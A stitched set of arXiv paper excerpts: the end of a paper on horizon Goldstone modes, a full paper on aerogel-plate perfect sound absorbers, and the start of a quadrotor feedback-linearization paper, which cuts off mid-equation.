So far we have considered the black hole spacetime which are static and hence generating only one Goldstone field. However for a gravitational background having intrinsic rotation such as Kerr spacetime, corresponding analysis of the Goldstone mode dynamics will be more effective. This is because in this case there will be more than one symmetry generator. This topic is now under investigation. Finally, we want to mention that since the Goldstone modes are thermal in nature, it might be interesting to look at BMS symmetry in this way hoping that such an analysis will be able to shed some light towards the microscopic description of horizon thermodynamics.
| 2024-02-18T23:40:08.603Z | 2020-05-06T02:12:05.000Z | algebraic_stack_train_0000 | 1,448 | 8,109 |
|
proofpile-arXiv_065-7113 | \section{Introduction}
Silica aerogels are extremely-lightweight nanoporous materials\cite{Kistler1931}. The frame of these materials consists of an assembly of connected small cross-sections beam-like elements resulting from fused nanoparticles. This particular assembly provides silica aerogel a very low elastic stiffness when compared to rigid silica structure of identical porosity. Aerogels possess a wide variety of exceptional properties such as low thermal conductivity, low dielectric constant, low index of refraction or a very large porosity (80-99.8$\%$) thus providing these materials an extremely low density\cite{Gesser_89}. Because of this large porosity and therefore of the very large available contact area, they have been used as filters, absorbent media or waste containment (see Refs. [\onlinecite{Cooper_89,Gesser_89,Komarneni_93}] and references therein). They have also been applied as catalysts or even to capture cosmic dust \cite{Hrubesh_98, Tsou_95}. Similarly, their low thermal conductivity, which so far seems to be their most interesting property compared to any other elastic or poroelastic material, has been exploited in various commercial applications including thermal insulation \cite{Herrmann_95}, heat and cold storage devices \cite{Hrubesh_98,Fricke_95}.
\par
In acoustics, aerogels are used as impedance matching materials to develop efficient ultrasonic devices \cite{Gronauer_86,Gerlach_92} or sound absorbing materials for anechoic chambers\cite{Hrubesh_98,Gibiat_95}. Beyond these properties, silica aerogel plates are excellent candidates to design new types of membrane metamaterials, since they exhibit subwavelength resonances and present absorption efficiency\cite{Guild_2016,Geslaina_2018}. Effectively, the use of membrane metamaterials to control acoustic waves has shown an increasing interest in recent years\cite{huang2016membrane}. Membrane and plate metamaterials have been employed in the past to design efficient absorbers\cite{mei2012dark,Ma_2014,yang2015subwavelength}, e.g., using a single membrane backed by a cavity \cite{Ma_2014,Romero_2016}, which can present deeper subwavelength resonances as compared with absorbing metamaterials based in air cavities\cite{li2016acoustic,jimenez2016,yang2017optimal,peng2018composite}. Moreover, double negative acoustic metamaterials\cite{yang2013coupled} can be achieved by combining a lattice of membranes, which provides a negative effective mass density \cite{Yang_2008}, with subwavelength side-branch resonators, which provides a negative effective bulk modulus\cite{Lee_2010}. In addition, periodic arrangements of clamped plates have been efficiently used to control harmonic generation\cite{Zhang_2016} or solitary waves in the nonlinear acoustic regime\cite{Zhang_2017}.
\par
In this work, we make use of the efficient and unusual attenuating properties of silica aerogel plates to design subwavelength perfect sound absorbers. The analyzed system is depicted in Fig.~\ref{fig1}(a) and consists of a periodic repetition of the resonant building units illustrated in Fig.~\ref{fig1}(b). These units are made of a slit loaded by a clamped aerogel plate backed by a closed cavity. The perfect absorption of this system is comprehensively analyzed both theoretically and experimentally. In a first stage, we model the system using the Transfer Matrix Method (TMM) accounting for the contribution of the losses to the problem, i.e., the viscothermal losses from the slit and cavity and the viscoelastic losses from the aerogel plate. In a second stage, we analyze the impedance matching condition, also known as critical coupling condition, which is obtained once the inherent losses exactly compensates the leakage of the system\cite{Romero_2016a}. The Argand diagram of the reflection coefficient \cite{brekhovskikh2012acoustics} is further employed to evaluate either the lack or excess of inherent losses in the system, thus providing important information on the impedance matching condition. The Argand diagram is revealed as a universal and powerful tool to design perfect absorbers.
\par
We consider a slotted panel of thickness $L$, whose slits, of height $h_s$, are loaded by a circular clamped aerogel plate of radius $r_m$ and thickness $h_m$ backed by a cylindrical air cavity of the same radius and depth $l_c$. The clamped aerogel plate plays the central role, as it represents the main source of intrinsic losses and mainly governs the resonance of the system. Although the theoretical calculations are only carried out for the building block of size $L\times a\times a$ shown in Fig.~\ref{fig1}(b), the generalization to the case of $N$ resonator unit cell is straightforward.
\begin{figure}[t]
\centering
\includegraphics[width=\columnwidth]{Fig01.pdf}
\caption{(color online) (a) Scheme of the panel under consideration constructed by a slit, the aerogel plate, and the cavity.
(b) Schematic description of the unit cell.}\vspace*{-5mm}
\label{fig1}
\end{figure}
For wavelengths $\lambda$ large enough compared to the thickness of the aerogel plate $h_m$ and neglecting the effects of rotary inertia and additional deflections caused by shear forces, the transverse plate displacement $w_m$ satisfies the Kirchhoff-Love wave equation \cite{Graff91}.
The plate can be described by $\rho$, the density and $D={Eh_m^3}/{12(1-\nu^2)}$, the bending stiffness. $E$ is the Young modulus and $\nu$ is the Poisson's ratio of the plate.
Assuming an implicit time dependence $e^{i\omega t}$, with $\omega$ the angular frequency, the viscoelastic behavior of silica aerogel can be modeled via a complex Young modulus, $E=E_0(1+i\eta\omega)$, where $E_0$ and $\eta$ are the unrelaxed Young modulus and the loss factor respectively.
In the subwavelength regime, the silica aerogel disk can be considered as a punctual resonant element located at $(x,y)=(L/2,a/2)$ (note that $h_m\ll\lambda_0$, where $\lambda_0$ is the wavelength in air).
The acoustic impedance of the clamped circular cross-sectional plate thus takes the form \cite{Skvor91,Bongard10},
\begin{equation} \label{eq.Zp}
Z_p = \frac{-i\omega\rho h_m}{\pi r_m^2}\frac{ I_1(k r_m) J_0(k r_m) + J_1(k r_m)I_0(k r_m)}{I_1(k r_m)J_2(k r_m)-J_1(k r_m)I_2(k r_m)},
\end{equation}
where $J_n$ and $I_n$ are the of $n$-th order regular and modified Bessel's functions of the first kind respectively and the wavenumber in the plate satisfies $k^2=\omega\sqrt{\rho h_m/D}$.
\par
Viscothermal losses also occurs in the narrow slits\cite{wardPRL2015} and in the cavity, also offering a useful degree of freedom to tune the losses of the system.
Assuming only plane wave propagates in these channels, the viscothermal losses are modeled by effective parameters: complex and frequency-dependent wavenumbers $k_s=\omega\sqrt{\rho_s/\kappa_s}$ and $k_c=\omega\sqrt{\rho_c/\kappa_c}$, and impedances $Z_s=\sqrt{\kappa_s\rho_s}/h_s a$ and $Z_c=\sqrt{\kappa_c\rho_c}/\pi r_m^2$ in the slit and in the cavity respectively. Note that we make use of the effective density $\rho_s$ and bulk modulus $\kappa_s$ of a slit \cite{stinson1991} for the slotted channel, while we make use of the effective density $\rho_c$ and bulk modulus $\kappa_c$ of a cylindrical duct\cite{stinson1991} for the cavity.
\begin{figure*}[t]
\centering
\includegraphics[width=1\textwidth]{Fig02.pdf}
\caption{(color online) Reflection coefficient, in logarithmic scale, as a function of the frequency and (a) slit length, $L$, and (b) cavity depth, $l_c$. The rest of parameters are fixed to the optimal geometry (see main text).
(c) Representation of the reflection coefficient in the complex frequency plane for the sample with optimized parameters.
The lines show the trajectory of the zero when the corresponding geometrical parameter is modified.
(d) and (e) show the absorption coefficient and the phase of the reflection coefficient respectively for three values of the slit thickness, $h^\prime_s$, $h_s$ (black line) being the optimum value.
(f) Argand diagram of the complex reflection coefficient from 0 to 1200 Hz, for the lossless structure (dashed circle), the case of perfect absorption (PA) geometry (black circle), the case $h_s'=h_s/2$, (red circle) and the case $h_s'=2h_s$ (blue circle). The small arrows indicate the trajectory from low to high frequencies.
}\vspace*{-6mm}
\label{fig2}
\end{figure*}
The scattering properties of the system are studied through the reflection coefficient $R$ obtained by TMM.
We relate the sound pressure and normal particle velocity at the surface of the system, $[P_0,V_0] = [P(x), V_x(x)]_{x=0}$ to the ones at the end of the system, $[P_L,V_L] = [P(x), V_x(x)]_{x=L}$, by a transfer matrix as
\begin{equation}\label{eq.TMM}
\left[\begin{array}{c}
P_0 \\
V_0 \\
\end{array}\right] = {\bf T} \left[\begin{array}{c}
P_L \\
V_L \\
\end{array}\right],\,
\text{where}\quad
{\bf T}={\bf M}_{\Delta l}{\bf M}_S{\bf M}_{R}{\bf M}_S.
\end{equation}
In Eq.~(\ref{eq.TMM}), transfer matrix over half the slit length ${\bf M}_S$ reads as
\begin{equation
{\bf M}_S=\left[\begin{array}{cc}
\cos\left(k_s{L}/{2}\right) & i Z_s\sin\left(k_s{L}/{2}\right) \\
{i}\sin\left(k_s{L}/{2}\right)/{Z_s} & \cos\left(k_s{L}/{2}\right) \\
\end{array}
\right],
\end{equation}
and ${\bf M}_{R}$ accounts for the local effect of the aerogel plate together with the back cavity as
\begin{equation
{\bf M}_{R}=\left[\begin{array}{cc}
1 & 0 \\
{1}/{Z_{R}} & 1 \\
\end{array}
\right],
\end{equation}
where $Z_{R}=Z_p - i Z_c\cot(k_c l_c)$. The matrix ${\bf M}_{\Delta l}$ provides the radiation correction of the slit to the free space as
\begin{equation
{\bf M}_{\Delta l}=\left[\begin{array}{cc}
1 & Z_{\Delta l} \\
0 & 1
\end{array}
\right],
\end{equation}
where $Z_{\Delta l}=-i\omega\Delta l\rho_0/\phi_sa^2$, with $\phi_s=h_s/a$ the surface porosity of the metasurface, $\rho_0$ the air density and $\Delta l$ the end correction length that can be approximated as\cite{kergomard1987}
\begin{equation}
\Delta l=h_s\phi_s\sum_{n=1}^{\infty}\frac{\sin^2(n\pi\phi_s)}{\left(n\pi\phi_s\right)^3}.
\end{equation}
The surface impedance at $x=0$ can thus be directly obtained using Eq. (\ref{eq.TMM}) and considering the rigid backing condition ($V_L = 0$) as
\begin{widetext}
\begin{equation}\label{eq.ZT}
Z_T = \frac{P_{0}}{V_{0}}= \dfrac{Z_s (Z_{\Delta l}+Z_{R})+i \tan \left({k_s L}/{2}\right) \left[i Z_s Z_{R} \tan \left({k_s L}/{2}\right)+2 Z_{\Delta l} Z_{R}+Z_s^2\right]}{Z_s+ 2 iZ_{R} \tan \left({k_s L}/{2}\right)}.
\end{equation}
\end{widetext}
Finally, we calculate the reflection and absorption coefficient using Eq.~(\ref{eq.ZT}) as
\begin{equation}\label{eq.Ref
R=\frac{Z_T-Z_0}{Z_T+Z_0},\quad\text{and}\quad \alpha=1-|R|^2,
\end{equation}
where $Z_0$ is the impedance of the surrounding medium, i.e., the air\footnote{For the air medium at room temperature and ambient pressure $P_0 = 101325$ Pa, we used an adiabatic coefficient $\gamma = 1.4$, a density $\rho_0 = 1.213$ kg/m$^3$, a bulk modulus $\kappa_0 = \gamma P_0$, a Prandtl number $\mathrm{Pr} = 0.71$, a viscosity $\eta_0 = 1.839\times 10^{-5}$ Pa$\cdot$s, a sound speed $c_0 = \sqrt{\gamma P_0/\rho_0}$ m/s, and an acoustic impedance $Z_0 = \rho_0 c_0 / a^2$.}. For the aerogel plate, we used an unrelaxed Young modulus $E_0=197.92$ kPa and a loss factor $\eta=4.47\times10^{-6}$ Pa$\cdot$s, a density $\rho = 80$ kg/m$^3$ and a Poison's ratio $\nu = 0.12$, as characterized in Ref. [\onlinecite{Geslaina_2018}]. Aerogel plates of $r_m=19.5$ mm and $h_m=10.5$ mm were selected and $a=42$ mm was fixed by the width of the square cross-sectional impedance tube that was used for the experimental validation.
\par
The procedure begins with looking for the geometric parameters giving the most efficient absorption at the lowest resonance frequency. The geometric parameters of the system are thus optimized numerically using a sequential quadratic programming (SQP) method \cite{powell1978}.
The following parameters were obtained: $L=44$ mm, $h_s=1.285$ mm, and $l_c=29.8$ mm. The highly efficient absorption peak also appears at 591.2 Hz and is associated with a reflection coefficient amplitude of $10\log_{10}|R| = -62$ dB. The corresponding perfectly absorbed wavelength is $\lambda/L=13.1$ times larger than he depth of the structure. This subwavelength feature is due to the slow sound properties induced by the presence of the slit loading resonators\cite{Groby2015,Groby2016,jimenez2016}. Effectively, the resonance frequency of the slit in the absence of these loading resonators is around 1900 Hz. \footnote{Note that the slow sound properties can be improved by using thinner aerogel plates, thereby allowing a strongly reduced ratio, e.g., $\lambda/L=30$ at $f=259$ Hz using $h_m = 1.32$ and $h_s= 0.95$ mm. Nevertheless, we are constrained by the available aerogel plates ($h_m=10.5$ mm) for the experimental validation.}
\begin{figure*}[t]
\centering\vspace*{-2mm}
\includegraphics[width=1\textwidth]{Fig03.pdf}
\caption{(color online) (a) Photograph of the experimental configuration.
(b) Absorption as a function of the frequency.
(c) Complex plane representation of the reflection coefficient. The small arrows indicate the trajectory from low to high frequencies.}\vspace*{-6mm}
\label{fig3}
\end{figure*}
Figures~\ref{fig2}(a) and \ref{fig2}(b) show a parametric study of the system reflection coefficient around the optimal configuration.
The reflection coefficient is significantly reduced when the parameters correspond to the optimal parameters (marked by white crosses).
However, the balance between the inherent losses and the leakage of the system is difficult to identify by using this parametric analysis.
A first approach to ensure that these parameters led to perfect absorption of the sound energy consists in representing the reflection coefficient in the complex frequency plane, as shown in Fig.~\ref{fig2}(c).
Using this representation, the locations of the zero/pole pairs of the reflection coefficient can be studied.
In the lossless case, the zeros are complex conjugates of their corresponding poles, both appearing in the opposite half spaces of complex frequency plane (zeros in the lower half space and poles in the upper one with our time Fourier convention).
However, the zeros follows a given trajectory towards the pole half space when losses are introduced in the system. Note that the losses are modified when modifying the system geometry. In this way, the trajectory of the lowest frequency zero is depicted Fig.~\ref{fig2}(c), when $h_s$, $l_c$ and $L$ are modified. For a given set of geometric parameters, the trajectory of the zero crosses the real frequency axis, ensuring the balance of the leakage by the inherent losses, therefore providing the perfect absorption\cite{Romero_2016a}.
\par
The complex frequency plane also gives useful insights to design and tune open lossy resonant systems\cite{Romero_2016,jimenez2016,Jimenez2017}. Such system is characterized by its leakage and the inherent losses; the impedance matching condition corresponds to the critical coupling of the system, i.e., the perfect balance of the leakage by the inherent losses. On the one hand, the intrinsic losses of the system are too large (too small) compared to the leakage of the system when the zero has (has not) already crossed the real axis, meaning that the absorption is not optimal as the impedance condition is not satisfied.
These situations are illustrated Fig.~\ref{fig2}(d), where the absorption coefficient is depicted for different values of $h_s$.
The red curve corresponds to a narrow slit (height $h_s'=h_s/2$) providing an excess of losses, while the blue curve corresponds to a wide slit (height $h_s'=2 h_s$) providing a lack of losses.
The location of the corresponding zero in the complex frequency plane is marked with red and blue crosses in Fig.~\ref{fig2}(c). The perfect balance between the leakage by the losses is the situation depicted on the color map Fig.~\ref{fig2}(c); the zero of the reflection coefficient is exactly located on the real frequency axis.
Therefore, we can conclude that the complex frequency plane is very useful to immediately identify if one particular configuration has a lack or excess of losses.
This approach has been recently used to design absorbing materials ranging from porous media\cite{JimenezActa2018,jimenez2016broadband} to different kind of metamaterials\cite{JImenezAppSci2017,Jimenez2017,Jimenez2017b,Groby2016,Romero_2016}. However, the acoustic behavior of all systems cannot necessarily be assessed in the complex frequency plane. Effectively, numerical methods do not usually allow to calculate solutions for complex frequencies, and more importantly, experimental results are usually only provided for real frequencies.
A useful approach to overcome this problem consists in analyzing the reflection coefficient $R=|R|e^{i\varphi}$, with $\varphi = \arctan [\textrm{Im}(R)/\textrm{Re}(R)]$, in the complex plane.
Figure ~\ref{fig2}(e) and (f) depict respectively the phase of the reflection coefficient and the corresponding Argand diagram from 400 to 800 Hz. The reflection coefficient is necessarily inscribed within the unitary circle, i.e., $|R|\leq1$. In the lossless case, the reflection coefficient follows the unitary circle counter-clockwise with increasing frequency starting from $\varphi=0$ at 0 Hz, as $R=e^{i\varphi}$. When losses are accounted for, the trajectory of $R$ is modified and follows an elliptical trajectory around the resonance, contained inside of the unitary circle and displaced along the real axis in the diagram. On the one hand, the reflection coefficient describes a loop that does not encompass the origin if the losses exceed the optimal ones, e.g. the red ellipse Figure ~\ref{fig2}(f) calculated for $h_s'=h_s/2$. On the other hand, the ellipse encompasses the origin if the losses lacks, e.g. the blue ellipse Figure ~\ref{fig2}(f) calculated for $h_s'=2h_s$.
Finally, the ellipse must pass through the origin, i.e., $R=0$, when perfect absorption is reached, e.g. the black ellipse Figure ~\ref{fig2}(f) calculated for $h_s'=h_s$.
In this situation, the impedance matching condition is satisfied.
\par
The designed optimal structure was validated experimentally in a square cross-sectional impedance tube.
The circular aerogel plate was cut by laser cutting and then inserted in a 3D-printed support manufactured by stereolithography (Form 2, Formlabs, UK).
In addition, full wave numerical simulations by finite element method (FEM) were performed.
For the FEM simulations, the plate was modeled as an elastic bulk plate of thickness $h_m$ considering a Kelvin-Voigt viscoelastic model and viscothermal losses were accounted for in the ducts using effective parameters as previously introduced for TMM calculations.
Figure \ref{fig3}(a) shows the 3D printed system together with the aerogel plate before assembling.
The measured absorption is shown in Fig.~\ref{fig3}(b). A good agreement is observed between the measurements, FEM simulations and TMM predictions.
The ripples observed in the experimental data are probably due to non-symmetrical errors during the manufacturing of the circular plate, as well as to the fact that the plate is not perfectly clamped.
Finally, Fig.~\ref{fig3}(c) presents the Argand diagram of the reflection coefficient measured and calculated with the TMM. Both curves passe through the origin at a specific frequency that corresponds to the one at which the system is impedance matched.
In summary, we have designed and manufactured a resonant building block made of cavity backed aerogel clamped plates that is suitable and efficient for perfect sound absorbing panel.
The experimental data agree with those predicted by both the one-dimensional TMM model and the FEM simulations.
We have presented a universal methodology based on the complex representation of the reflection coefficient, i.e., its Argand diagram, to identify the lack or the excess of losses in the system.
This tool can be used further to design complex metasurfaces for perfect sound absorption when the system cannot be evaluated at complex frequencies, thus helping in the rapid design of novel and efficient absorbing metamaterials.
\begin{acknowledgments}
This work has been funded by the RFI \textit{Le Mans Acoustique}, R\'egion Pays de la Loire. N.J. acknowledges financial support from Generalitat Valenciana through grant APOSTD/2017/042.
J.-P.G and V.R.G. gratefully acknowledge the ANR-RGC METARoom (ANR-18-CE08-0021) project and the HYPERMETA project funded under the program \'Etoiles Montantes of the R\'egion Pays de la Loire.
J.S-D. acknowledges the support of the Ministerio de Econom\'{\i}a y Competitividad of the Spanish government, and the European Union FEDER through project TEC2014-53088-C3-1-R.
\end{acknowledgments}
| 2024-02-18T23:40:08.671Z | 2019-06-13T02:04:49.000Z | algebraic_stack_train_0000 | 1,454 | 3,349 |
|
proofpile-arXiv_065-7120 | \section{Introduction}
\label{sec:intro}
\IEEEPARstart{F}{eedback} Linearization (FL) technique allows transforming a command-affine non-linear model of the UAV quadrotor into an equivalent (fully or partly) linear one. Specifically, FL: (i) pursues the collection of all the model non-linearities in specific points, e.g. at the command level, and (ii) achieves an input-output linearization by means of a non-linear feedback, performing a perfect cancellation of non-linearities~\cite{khalil1996noninear}.
Nevertheless, model uncertainties make non-linear terms uncertain, and their use into the FL feedback may imply performance degradation and/or instability. Hence, this study proposes to use FL in combination with the Embedded Model Control (EMC) framework. In short, the designed FL-EMC approach let us to treat non-linearities as known and unknown disturbances to be estimated and then rejected, thus enhancing control robustness and performance. To this purpose, the study in~\cite{lotufoIEEE_TBC} focused on the so-called normal form representation of the non-linear model, where the non-linearities are collected at the command level, which perfectly fits the EMC internal model design rationale~\cite{lotufoIEEE_TBC}.
\section{Feedback Linearization}
\label{sec:fla}
The feedback linearization (FL) technique is an effective resource to linearize a non-linear model, by introducing a proper state transformation and a non-linear feedback~\cite{slotine1991applied}. Then, starting from the new linear model (i.e. the feedback-linearized one), a linear controller can be designed. In practice, within the FL, the model input-output linearization is obtained by differentiating each model output many times, until a control input component appears in the resulting equation.
Generally speaking, the feedback-linearized model is obtained by means of a system state transformation (diffeomorphism) and a non-linear feedback~\cite{slotine1991applied}. The state variables of the transformed model are the Lie derivatives of the system output $\mathbf{y}$. This implies that the choice of the output vector is extremely important to accomplish the input-output linearization.
Let us consider a command-affine square non-linear system, with state vector $\mathbf{x}\,{\in}\,R^{n}$, input $\mathbf{u}\,{\in}\,R^{m}$, and output $\mathbf{y}\,{\in}\,R^{m}$:
\begin{equation}
\label{eq:model_nl}
\begin{split}
\dot{\mathbf{x}}(t) &= \mathbf{f}(\mathbf{x}(t)) + G(\mathbf{x}(t))\mathbf{u}(t) , \: \mathbf{x}(0)=\mathbf{x}_0, \\
\mathbf{y}(t) &= \mathbf{h}(\mathbf{x}(t)),
\end{split}
\end{equation}
where $\mathbf{f}$ and $\mathbf{h}$ represent smooth vector fields~\cite{khalil1996noninear}, while $G\,{\in}\,R^{{n{\times}m}}$ is a matrix with smooth vector fields as columns. Denoting with $r_i$ the relative degree of the $i{-}th$ output, we aimed to obtain an equivalent non-linear model, where all non-linearities have been collected at the command level, i.e.:
\begin{equation}
\label{eq:model_fl}
\begin{bmatrix}
y_1^{(r_1)} \\ y_2^{(r_2)} \\ \dots \\ y_m^{(r_m)} \\
\end{bmatrix}(t) = E(\mathbf{x}(t))\mathbf{u}(t) + \mathbf{b}(\mathbf{x}(t)),
\end{equation}
where $y^{(n)}(t)$ denotes the time derivative of order $n$. Specifically,~\eqref{eq:model_fl} represents a cascade of integrators in parallel, where the output and its derivatives are the new state variables $\mathbf{z}$ defined as:
\begin{equation}
\label{eq:statetrans}
\begin{split}
\mathbf{z}\,{=}\,T(\mathbf{x})\,{=}\,[ & y_1 \:\: y_1^{(1)} \:\: \dots \:\: y_1^{(r_1-1)} \:\: \dots \\
& y_2 \:\: y_2^{(1)} \:\: \dots \:\: y_2^{(r_2-1)} \:\: \dots \\
& \dots \\
& y_m \:\: y_m^{(1)} \:\: \dots \:\: y_m^{(r_m-1)} ]^T,
\end{split}
\end{equation}
where $T(\mathbf{x})$ represents a diffeomorfism.
Whenever this state transformation is applicable and the decoupling matrix $E(\cdot)$ is invertible, it is possible to linearize the equivalent model~\eqref{eq:model_fl} via the non-linear feedback:
\begin{equation}
\label{eq:law_fl}
\begin{split}
\mathbf{u}(t) = E(\mathbf{x}(t))^{-1} \left( \mathbf{v}(t) - \mathbf{b}(\mathbf{x}(t)) \right).
\end{split}
\end{equation}
where $\mathbf{v}$ is a new equivalent command. Hence, by applying the feedback~\eqref{eq:law_fl} to the model~\eqref{eq:model_fl}, a parallel of $m$ decoupled input-output channels, represented by cascaded integrators, is obtained, viz.:
\begin{equation}
\label{eq:lin_mdl}
\begin{split}
\begin{bmatrix}
y_1^{(r_1)} \\ y_2^{(r_2)} \\ \dots \\ y_m^{(r_m)} \\
\end{bmatrix}(t) &= \mathbf{v}(t)
\end{split},
\end{equation}
where the new command $\mathbf{v}$ is used for the design of a linear controller.
A ``full" input-output linearization is achieved if the sum of the output relative degrees is equal to the order of the model~\eqref{eq:model_nl}~\cite{slotine1991applied}. When this condition is not verified, some dynamics are hidden by the state transformation. This so-called ``internal" dynamics could be unstable~\cite{slotine1991applied}. In this case the feedback linearization process fails.
Finally, when $E(\cdot)$ is not invertible in $R^{n}$, it is possible to adopt a new command vector by considering the derivative of some of the command components. This solution, called dynamic extension~\cite{slotine1991applied}, enables the applicability of the feedback linearization by making the $E(\cdot)$ invertible, yet at a cost: the introduction of a dynamics in the command.
Furthermore, let us remark that the non-singularity condition of $E(\cdot)$ is not necessary verified in the complete state space. As a matter of fact, in some applications, these singularities can be avoided by applying proper constrains to the state trajectories.
\section{The Quadrotor UAV Case-study}
\label{sec:quad_fla}
As above depicted, the input-output linearization is achieved by differentiating each output many times until a control input appears. Hence, the successful application of the feedback linearization is strongly dependent on the output vector.
As a matter of fact, the adopted Quadrotor UAV dynamics, which encompasses four commands and three outputs~\cite{lotufoIEEE_TBC}, is characterized by a non-square decoupling matrix $E(\cdot)\,{\in}\,\mathcal{R}^{3,4}$~\cite{mistler2001_FL}. Therefore, in~\cite{lotufoIEEE_TBC}, the quadrotor heading angle $\psi$ was selected as an additional output to be controlled, so to make the FL applicable to the Quadrotor UAV model~\cite{lotufoIEEE_TBC}.
However, in the quadrotor UAV case-study treated in~\cite{lotufoIEEE_TBC}, the problem is not solvable by means of a static feedback~\cite{mistler2001_FL}. Conversely, a full linearization may be only achieved by introducing additional states to the standard quadrotor model, thus obtaining the so-called extended model~\cite{mistler2001_FL}. In fact, in order to obtain a non-singular decoupling matrix $E(\cdot)$, the second derivative of the first command component, $u_1$ in \figurename~\ref{fig:extended}, with respect to time was also needed.
As a result, the introduction of two more states, i.e. $\zeta\,{=}\,u_1$ and its derivative $\chi\,{=}\,\dot{u}_1$, lead to define the Quadrotor UAV extended model, whose state vector is $\mathbf{x}\,{=}\,\left[ \mathbf{r}^T \:\: \mathbf{v}^T \:\: \boldsymbol{\theta}^T \:\: \boldsymbol{\omega}_b^T \:\: \zeta \:\: \chi \right]^T$, where $\mathbf{r}$ and $\mathbf{v}$ are respectively the inertial position and velocity of the CoM, $\boldsymbol{\theta}=[\phi \:\: \theta \:\: \psi]^T$ are the attitude angles, and $\boldsymbol{\omega}_b$ is the body angular rate vector.
Hence, the model, sketched in \figurename~\ref{fig:extended}, holds~\cite{lotufoIEEE_TBC}:
\begin{equation}
\label{eq:extended_quad}
\begin{split}
\boldsymbol{\dot{\theta}}(t) &= A(\boldsymbol{\theta}(t)) \boldsymbol{\omega}_b(t), \quad \boldsymbol{\theta}(0)= \boldsymbol{\theta}_0, \\
A(\boldsymbol{\theta}) &=
\frac{1}{c_{\theta}}
\begin{bmatrix}
c_{\psi} & -s_{\psi} & 0 \\
c_{\theta}s_{\psi} & c_{\theta}c_{\psi} & 0 \\
-s_{\theta}c_{\psi} & s_{\theta}s_{\psi} & c_{\theta}
\end{bmatrix}, \\
\dot{\boldsymbol{\omega}}_b(t) &= \mathbf{u}(t) - J^{-1}(\boldsymbol{\omega}_b(t) \times J\boldsymbol{\omega}_b(t)) + \mathbf{d}(t), \\
\boldsymbol{\omega}_b(0) &= \boldsymbol{\omega}_{b0}, \\
\dot{\mathbf{r}}(t) &= \mathbf{v}(t), \quad \mathbf{r}(0) = \mathbf{r}_0, \\
\dot{\mathbf{v}}(t) &= R_{b}^i(\boldsymbol{\theta})\begin{bmatrix} 0 & 0 & \zeta(t) \end{bmatrix}^T
- \mathbf{g} + \mathbf{a}_d(t), \\
\mathbf{v}(0) &= \mathbf{v}_0, \\
\dot{\zeta}(t) &= \chi(t), \\
\dot{\chi}(t) &= \ddot{u}_1(t), \\
\mathbf{y}(t) &= \begin{bmatrix} \mathbf{r} \\ \psi \end{bmatrix}(t), \quad
\overline{\mathbf{u}} = \begin{bmatrix} \ddot{u}_1 \\ \mathbf{u} \end{bmatrix}(t).
\end{split}
\end{equation}
In~\eqref{eq:extended_quad}, $\mathbf{u}$ is the command torque along the three body axes, while $J$ is the quadrotor inertia matrix. In addition, $R^i_{b}(\boldsymbol{\theta})$ describes the body-to-inertial attitude, $\mathbf{g}\,{=}\,\left[ 0 \:\: 0 \:\: 9.81 \right]^T$ is the gravity vector, while $\mathbf{d}$ and $\mathbf{a}_d$ represent all the external disturbances (e.g. wind, rotor aerodynamics, mechanical vibration, actuator noise) affecting the model dynamics. Finally, $\overline{\mathbf{u}}$ and $\mathbf{y}$ are the new command vector and the extended model output, respectively.
\begin{figure}[!t]
\centering
\includegraphics[width=2.5in]{QuadrotorModelExtended_V2}
\caption{Quadrotor UAV extended Model.}
\label{fig:extended}
\end{figure}
The extended model~\eqref{eq:extended_quad} is the foremost building block of the feedback linearization process, performed to obtain the feedback-linearized model leveraged in~\cite{lotufoIEEE_TBC} to design the internal model for the EMC state and disturbance predictor. To this aim, starting from the overall model in~\eqref{eq:extended_quad}, we will derive the feedback-linearized heading and CoM dynamics, through the procedure outlined in Sec. II.
\subsection{The Quadrotor UAV Dynamics}
\label{subsec:quad_fla_head}
Considering the quadrotor attitude kinematics in~\eqref{eq:extended_quad}, let us start from the heading dynamics. The first order time-derivative of the heading angle holds:
\begin{equation}
\label{eq:psi_1}
\begin{split}
\psi^{(1)}(t) &= \eta(t) = \mathbf{b}_{\psi}(\boldsymbol{\theta}(t))\boldsymbol{\omega}_b(t), \\
\mathbf{b}_{\psi}(\boldsymbol{\theta}(t)) &= [ -t_\theta c_\psi \quad t_\theta s_\psi \quad 1].
\end{split}
\end{equation}
A further derivative is needed in order to relate the output with the command, viz.:
\begin{equation}
\label{eq:fl_heading}
\begin{split}
\psi^{(2)}(t) &= \mathbf{b}_{\psi}(\boldsymbol{\theta}(t))(\mathbf{u}(t) - \mathbf{h}_g(t) + \mathbf{d}(t)) + \dot{\mathbf{b}}_{\psi}(\boldsymbol{\theta}(t))\boldsymbol{\omega}_b(t)= \\
&= \mathbf{b}_{\psi}(\boldsymbol{\theta}(t))\mathbf{u}(t) + h_\psi(\mathbf{x}(t)) + d_\psi(t),
\end{split}
\end{equation}
where we defined $h_\psi$ and $d_\psi$ as:
\begin{equation}
\label{eq:fl_heading2}
\begin{split}
h_\psi(\mathbf{x}(t)) &= \dot{\mathbf{b}}_{\psi}(\boldsymbol{\theta}(t))\boldsymbol{\omega}_b(t) - \mathbf{b}_{\psi} (\boldsymbol{\theta}(t))\mathbf{h}_g(t), \\
d_\psi(t) &= \mathbf{b}_{\psi}(\boldsymbol{\theta}(t))\mathbf{d}(t).
\end{split}
\end{equation}
Concerning the CoM dynamics, to relate the output with the command (cf. Sec.~\ref{sec:fla}), two derivatives will be needed; starting from the CoM acceleration.
Specifically, the CoM position third derivative, i.e. the jerk $\mathbf{s}$, holds:
\begin{multline}
\label{eq:jerk}
\mathbf{r}^{(3)}(t) = \mathbf{s}(t) = \\
= R_b^i(\boldsymbol{\theta}(t))\left( \begin{bmatrix}
0 \\ 0 \\ \chi(t)
\end{bmatrix} +
S(\boldsymbol{\omega}_b(t))\begin{bmatrix} 0 \\ 0 \\ \zeta(t) \end{bmatrix} \right) + \dot{\mathbf{a}}_d(t),
\end{multline}
being $S(\boldsymbol{\omega}_b)$:
\begin{equation}
\label{eq:jerk2}
\begin{split}
S(\boldsymbol{\omega}_b) = \begin{bmatrix}
0 & -\omega_z & \omega_y \\ \omega_z & 0 & -\omega_x \\ -\omega_y & \omega_x & 0
\end{bmatrix}
\end{split}.
\end{equation}
In~\eqref{eq:jerk}, the first term on the right-hand side represents the contribution of the vertical jerk command, whereas the second term is the jerk component due to the quadrotor angular rates.
Moreover, a further derivative of~\eqref{eq:jerk} is necessary in order to have a full-rank decoupling matrix $E(\cdot)$. Hence, it holds:
\begin{multline}
\label{eq:r4_1}
\mathbf{r}^{(4)}(t) = R_b^i(\boldsymbol{\theta}(t))\begin{bmatrix}
\dot{\omega}_y \zeta \\ -\dot{\omega}_x \zeta \\ \ddot{u}_1 \end{bmatrix}(t) + \\
